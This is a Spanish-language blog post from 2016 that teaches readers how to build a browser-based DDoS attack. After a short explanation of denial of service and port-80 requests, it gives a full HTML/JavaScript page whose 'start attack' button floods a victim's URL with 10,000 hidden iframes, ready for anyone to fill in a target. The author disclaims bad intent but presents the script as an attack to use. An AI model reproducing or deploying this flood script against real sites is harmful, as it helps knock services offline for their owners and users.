martes, 17 de mayo de 2016

Creacion y Funcionamiento de un ataque ddos desde el navegador

hola amigos en este tutorial mostrare como es que algunos crean y hacen sus ataques ddos, primeramente que definamos que es un ataque ddos.

ddos: distributed denial of service que significa en español denegación de servicio distribuida.

y que es eso pues bueno en pocas palabras es cuando varios usuarios están asiendo peticiones al servidor web de x pagina y pues de tantas peticiones este llega a colapsar por que no tiene la capacidad suficientes para atender a tatas personas, hasta que llega el momento de quedar sin servicio o mejor dicho se cae.

y se preguntaran que es una petición, una petición vendría siendo como cuando le enviamos algo al servidor,descargamos algo de el o la mas simple de todas las peticiones visitar la pagina esta ultima es una de la mas explotadas para un ataque ddos ya que le estaremos asiendo una petición al puerto 80 del servidor para que nos muestre dicha pagina.

ya que menciono el puerto 80 no es el único puerto al que se le pueden hacer peticiones hay muchos puertos en un servidor web y dependiendo el funcionamiento de estos también seles podría hacer peticiones.

pero en este tema solo veremos el puerto 80, yo cree este tutorial para que entiendan el funcionamiento de un ataque ddos y no se trate como un tabu, mi intención no es dañar a nadie ya que el conocimiento es de todos no de unos pocos.

bueno empecemos para este tutorial solo aremos peticiones al puerto 80 y se preguntaran como lo vamos hacer abriremos muchas pestañas senos trabaría la maquina.

pues algo por el estilo, en ves de usar pestañas usaremos los iframes y para que no nos consuma mucha memoria en nuestra pc los haremos lo mas diminutos posibles.

para eso crearemos el siguiente código en html

<HTML>
<HEAD>
<TITLE>ATAQUE DDOS POR FLAMER</TITLE>
</HEAD>
<BODY>
<input type="button" value="Iniciar Atake DDOS" onclick="inicia()">
<script language="javascript">
function inicia()
{
   var x;
   for(x=0;x<10000;x++)
   {
    document.write("<iframe src='url' width='1' height='1'></iframe>")
   }    
}
</script>
</BODY>
</HTML>


donde dice url es donde ira la pagina de la victima y al ejecutarla a parecerá lo siguiente


bueno al presionar el boton nos mostrara el siguiente resultado


con esto estaremos haciendo 10000 peticiones a la pagina, y dirán esto es de lamber no creo que tumbes una pagina web con iframes, pues bueno tal ves no o tal ves si y mejor me reservo mis ideas.


hay muchas formas de hacer ddos a una pagina yo solo mostré una ya que este tema se considera delicado

Saludos Flamer y no es algo tan avanzado pero es para que seden una idea de como se hace, y por otro lado también mis conocimientos son de un novato, no soy un experto como otros piensan


1 comentario: